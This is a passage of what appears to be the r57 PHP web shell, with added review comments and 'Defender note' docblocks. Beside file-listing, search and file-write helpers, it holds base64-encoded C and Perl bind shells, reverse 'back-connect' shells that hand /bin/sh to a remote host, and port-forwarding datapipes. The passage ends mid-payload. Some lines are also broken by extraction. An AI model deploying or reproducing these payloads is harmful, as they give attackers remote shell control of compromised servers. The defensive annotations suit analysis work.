echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td
bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>".
$text[$l][$n]."</b></div></font></td></tr></table>";
return null;
}
function mr($l,$n)
{
$text['ru'] = array('Íå óäà ëîñü îòïðà âèòü
ïèñüìî','Ïèñüìî îòïðà âëåÃî');
$text['eng'] = array('Can't send mail','Mail sent');
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td
bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>".
$text[$l][$n]."</b></div></font></td></tr></table>";
return null;
}
/**
 * Formats a numeric file mode as an `ls -l` style string (type character + rwx triplets).
 *
 * Returns 0 immediately when the global $windows flag is set.
 * The setuid (0x800), setgid (0x400) and sticky (0x200) bits replace the execute character
 * with s/S, s/S and t/T, lower case when the execute bit is also set.
 *
 * NOTE(review): the type tests are an if/else chain of single-mask `&` checks whose masks
 * overlap (for example a mode containing 0xA000 also satisfies the earlier `& 0x2000` test),
 * so some file types are reported by an earlier branch than the one written for them.
 *
 * @param int $mode mode bits; presumably a fileperms() result - caller not shown
 * @return string|int ten-character permission string, or 0 on Windows
 */
function perms($mode)
{
if ($GLOBALS['windows']) return 0;
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
// special bits override the execute column
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
/**
 * Builds an HTML <input> tag from the given type, name, optional size and value.
 *
 * The size attribute is emitted only when $size is non-zero. None of the arguments is
 * HTML-escaped before being concatenated into the tag.
 *
 * NOTE(review): the value= line appears to have lost its backslash-escaped quotes in page
 * extraction; as printed it is not valid PHP.
 *
 * @return string the tag markup
 */
function in($type,$name,$size,$value)
{
  $ret = "<input type=".$type." name=".$name." ";
  if($size != 0) { $ret .= "size=".$size." "; }
  $ret .= "value="".$value."">";
  return $ret;
}
/**
 * Resolves a program name to a path by running `which $pr` through ex().
 *
 * Returns the command output when it is non-empty, otherwise the name unchanged.
 * $pr is interpolated into the command line without quoting.
 * Defender note: `which <tool>` child processes under the web server account show which
 * local tools the script is looking for; the callers are outside this block.
 *
 * @param string $pr program name
 * @return string
 */
function which($pr)
{
$path = ex("which $pr");
if(!empty($path)) { return $path; } else { return $pr; }
}
/**
 * Writes base64-decoded content to a file (create/truncate), i.e. the script's file-drop helper.
 *
 * Opens $fname with mode "w"; when the open fails, we($fname) prints the "can't write" error
 * and nothing is written. All calls are @-suppressed.
 * The callers are outside this block; the base64 string variables defined later in this file
 * ($port_bind_bd_c, $port_bind_bd_pl, $back_connect, $back_connect_c, $datapipe_c,
 * $datapipe_pl) look like the intended $text inputs - confirm at the call sites.
 * Defender note: new files created by the web server account in writable directories are the
 * file-system trace of this helper; file-integrity monitoring on those paths covers it.
 *
 * @param string $fname destination path
 * @param string $text  base64-encoded content
 */
function cf($fname,$text)
{
  $w_file=@fopen($fname,"w") or we($fname);
  if($w_file)
  {
  @fputs($w_file,@base64_decode($text));
  @fclose($w_file);
  }
}
/**
 * Returns one two-cell HTML table row: $t1 right-aligned in a cell $l percent wide,
 * $t2 left-aligned in the second cell. The arguments are not HTML-escaped.
 *
 * @return string
 */
function sr($l,$t1,$t2)
  {
  return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td
class=td1 align=left>".$t2."</td></tr>";
  }
/* Defined only when no view_size() already exists, so the script can be included next to
   code that provides its own. */
if (!@function_exists("view_size"))
{
/**
 * Formats a byte count as a human-readable string with a GB / MB / KB / B suffix
 * (1024-based thresholds, two decimal places for the scaled units).
 *
 * @param int|float $size size in bytes
 * @return string
 */
function view_size($size)
{
  if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
  elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
  elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
  else {$size = $size . " B";}
  return $size;
}
}
    /**
     * Recursively collects the paths of all files below $dir.
     *
     * When $types is non-empty it is split on ";" and only files whose extension (the text
     * from the last "." onward, dot included) is in that list are kept. Unreadable
     * directories are skipped silently because opendir() is @-suppressed.
     * NOTE(review): there is no depth limit or symlink check in this walk.
     *
     * @param string $dir   directory to walk
     * @param string $types optional ";"-separated extension filter, e.g. ".php;.inc"
     * @return array list of "dir/file" paths
     */
    function DirFilesR($dir,$types='')
    {
      $files = Array();
      if(($handle = @opendir($dir)))
      {
        while (false !== ($file = @readdir($handle)))
        {
          if ($file != "." && $file != "..")
          {
            if(@is_dir($dir."/".$file))
              $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
            else
            {
              // extension = substring starting at the last "."
              $pos = @strrpos($file,".");
              $ext = @substr($file,$pos,@strlen($file)-$pos);
              if($types)
              {
                 if(@in_array($ext,explode(';',$types)))
                   $files[] = $dir."/".$file;
              }
else
                  $files[] = $dir."/".$file;
            }
        }
      }
      @closedir($handle);
    }
    return $files;
  }
  /**
   * Text search over a set of directories: collects the files once in the constructor and
   * SearchText() then scans every file line by line with a regular expression.
   *
   * Written in PHP 4 style (`var` properties, constructor named after the class); PHP 8 no
   * longer treats a same-named method as the constructor, which dates the code.
   * Defender note: the search text comes from the request (see the search_text handler) and is
   * placed into the pattern without preg_quote(), and the walk opens every file under the
   * chosen directories, so one request causes a burst of file reads by the web server account.
   */
  class SearchResult
  {
    var $text;               // search text as supplied by the caller
    var $FilesToSearch;      // list of file paths gathered by DirFilesR()
    var $ResultFiles;        // file name => (1-based line number => highlighted line)
    var $FilesTotal;         // count($FilesToSearch)
    var $MatchesCount;       // total matches over all files
    var $FileMatschesCount;  // NOTE(review): misspelt; the code uses $this->FileMatchesCount
    var $TimeStart;          // getmicrotime() at construction
    var $TimeTotal;          // elapsed seconds, set at the end of SearchText()
    var $titles;             // initialised to an empty array; not filled in this class
    /**
     * @param string $dir    one or more directories separated by ";"
     * @param string $text   text to search for (words separated by spaces)
     * @param string $filter optional extension filter passed through to DirFilesR()
     */
    function SearchResult($dir,$text,$filter='')
    {
      $dirs = @explode(";",$dir);
      $this->FilesToSearch = Array();
      for($a=0;$a<count($dirs);$a++)
        $this->FilesToSearch = @array_merge($this-
>FilesToSearch,DirFilesR($dirs[$a],$filter));
      $this->text = $text;
      $this->FilesTotal = @count($this->FilesToSearch);
      $this->TimeStart = getmicrotime();
      $this->MatchesCount = 0;
      $this->ResultFiles = Array();
      $this->FileMatchesCount = Array();
      $this->titles = Array();
    }
    // Plain accessors for the fields populated by the constructor and SearchText().
    function GetFilesTotal() { return $this->FilesTotal; }
    function GetTitles() { return $this->titles; }
    function GetTimeTotal() { return $this->TimeTotal; }
    function GetMatchesCount() { return $this->MatchesCount; }
    function GetFileMatchesCount() { return $this->FileMatchesCount; }
    function GetResultFiles() { return $this->ResultFiles; }
    /**
     * Scans every collected file and records the matching lines.
     *
     * The search text is split on spaces and the words are joined with "|" into one
     * alternation; matching is case-insensitive unless $case is truthy. Each line is trimmed
     * and passed through strip_tags() before matching, and matches are wrapped in a
     * highlighting <SPAN>.
     * NOTE(review): 'b'.$v.'b' and the "<b>1</b>" replacement presumably read '\b' and '\1'
     * before backslashes were lost in page extraction.
     * NOTE(review): `@file($filename) or @next;` - `next` here is a bare identifier, not a
     * loop control statement, so an unreadable file just yields an empty inner loop.
     *
     * @param int $phrase truthy: wrap each word with the word-boundary markers
     * @param int $case   truthy: case-sensitive matching
     */
    function SearchText($phrase=0,$case=0) {
    $qq = @explode(' ',$this->text);
    $delim = '|';
      if($phrase)
        foreach($qq as $k=>$v)
          $qq[$k] = 'b'.$v.'b';
      $words = '('.@implode($delim,$qq).')';
      $pattern = "/".$words."/";
      if(!$case)
        $pattern .= 'i';
      foreach($this->FilesToSearch as $k=>$filename)
      {
        $this->FileMatchesCount[$filename] = 0;
        $FileStrings = @file($filename) or @next;
        for($a=0;$a<@count($FileStrings);$a++)
        {
          $count = 0;
          $CurString = $FileStrings[$a];
$CurString = @Trim($CurString);
           $CurString = @strip_tags($CurString);
           $aa = '';
           if(($count = @preg_match_all($pattern,$CurString,$aa)))
           {
             $CurString = @preg_replace($pattern,"<SPAN style='color:
#990000;'><b>1</b></SPAN>",$CurString);
             // results are keyed by 1-based line number
             $this->ResultFiles[$filename][$a+1] = $CurString;
             $this->MatchesCount += $count;
             $this->FileMatchesCount[$filename] += $count;
           }
         }
       }
       $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
     }
  }
  /**
   * Returns the current time in seconds as a float with microsecond precision, built from
   * the two space-separated parts of the microtime() string ("usec sec").
   *
   * @return float
   */
  function getmicrotime()
  {
     list($usec,$sec) = @explode(" ",@microtime());
     return ((float)$usec + (float)$sec);
  }
$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZS
A8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0Ka
W50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsN
CiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1
vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIH
NvY2tmZCA9IHNvY2tldChBRl9JTkVULF
NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb
2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdm
ZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml
0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zi
kpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyc
iwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50
IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQp
pZihlbnRlcmVkW2ldID09ICdccicpDQp
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn
0=";
$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR
1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3Rj
cCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2N
rb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaW
UgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT
05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05O
IjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCB
leGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
lIENPTk47DQpleGl0IDA7DQp9DQp9";
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3Rl
bT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVls
xXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZH
IpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX
1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7
DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3R
lbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2
x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pb
iBzaW47DQogY2hhciBybXNbMjFdPSJyb
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9w
b3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndls
xXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1
ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgc
GVycm9yKCJbLV0gY29ubmVjdCgpIik7D
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1
cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk
7IA0KfQ==";
$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbm
NsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI
2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQoj
aWZkZWYgU1RSRVJST1INCmV4dGVybiBj
aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGV
maW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm
4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KI
CBjaGFyICoqYXJndjsgIA0KeyANCiAga
W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAg
c3RydWN0IHNvY2thZGRyX2luIGxhZGRy
LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHN
yLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQ
ogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9yd
CByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQog
IGlmICghKGggPSBnZXRob3N0YnluYW1l
KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQo
gICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID
0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sI
ElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5
ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXp
lb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KIC
AgIHBlcnJvcigibGlzdGVuIik7DQogIC
AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoI
mZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChj
c29jayA9IGFjY2VwdChsc29jaywgJmNh
ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICA
gIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKS
k7DQogICAgICBzaHV0ZG93bihjc29jay
wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ie
XQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5H
KSA+IDApOw0KICB9DQogIHJldHVybiAy
MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIEl
QUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ2
90byBxdWl0MTsNCiAgfQ0KICBvYWRkci
5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7D
QogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXpl
b2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl
0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZm
Rzcik7DQogICAgRkRfU0VUKGNzb2NrLC
ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogI
CAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6
ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCB
GRF9JU1NFVChjc29jaywmZmRzZSkpIHs
NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQ
ogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJ
mZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290
byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0Mjo
NCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMi
k7DQogcXVpdDA6DQogIGZjbG9zZShjZm
lsZSk7DQogIHJldHVybiAwOw0KfQ==";
$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2Nhb
HBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1
bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk
7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdC
cgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0Z
W4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+
YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZml
uZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsIC
RudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86O
lNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0
aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eyd
kaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2
ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0a
CksIDEpID0gMSBpZiAkdGg7DQpteSgkc
m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsN
CmlmICghJHJvdXQgICYmICAhJGVvdXQp
IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW9
1dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1Zm
ZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9P
SAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRo
KSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
